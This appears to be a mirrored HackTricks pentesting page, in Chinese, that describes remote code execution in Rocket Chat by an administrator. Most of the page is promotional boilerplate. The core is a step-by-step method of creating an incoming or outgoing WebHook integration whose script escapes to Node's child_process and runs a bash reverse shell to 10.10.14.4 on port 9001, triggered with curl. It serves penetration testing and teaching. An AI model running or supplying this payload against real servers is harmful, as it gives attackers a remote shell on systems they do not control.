mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-26 22:52:06 +00:00
3.9 KiB
3.9 KiB
Rocket Chat
从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS Red Team Expert)!
支持 HackTricks 的其他方式:
- 如果您想看到您的公司在 HackTricks 中做广告或下载 PDF 版的 HackTricks,请查看订阅计划!
- 获取官方 PEASS & HackTricks 商品
- 探索PEASS 家族,我们独家的NFTs系列
- 加入 💬 Discord 群组 或 电报群组 或在 Twitter 🐦 @carlospolopm** 上关注我们**。
- 通过向 HackTricks 和 HackTricks Cloud github 仓库提交 PR 来分享您的黑客技巧。
{% embed url="https://websec.nl/" %}
RCE
如果您是 Rocket Chat 内的管理员,您可以获得 RCE。
- 转到**
Integrations
,选择New Integration
,并选择任何一个:Incoming WebHook
** 或Outgoing WebHook
。 /admin/integrations/incoming
- 根据文档,两者都使用 ES2015 / ECMAScript 6(基本上是 JavaScript)来处理数据。因此,让我们为 JavaScript 获取一个用于反向 shell 的 rev shell:
const require = console.log.constructor('return process.mainModule.require')();
const { exec } = require('child_process');
exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")
- 配置 WebHook(频道和发布者用户名必须存在):
- 配置 WebHook 脚本:
- 保存更改
- 获取生成的 WebHook URL:
- 使用 curl 调用它,您应该收到反向 shell
{% embed url="https://websec.nl/" %}
从零开始学习 AWS 黑客技术,成为专家 htARTE(HackTricks AWS 红队专家)!
支持 HackTricks 的其他方式:
- 如果您想在 HackTricks 中看到您的 公司广告 或 下载 PDF 版本的 HackTricks,请查看 订阅计划!
- 获取 官方 PEASS & HackTricks 商品
- 探索 PEASS 家族,我们的独家 NFTs
- 加入 💬 Discord 群组 或 电报群组 或 关注 我们的 Twitter 🐦 @carlospolopm。
- 通过向 HackTricks 和 HackTricks Cloud github 仓库提交 PR 来分享您的黑客技巧。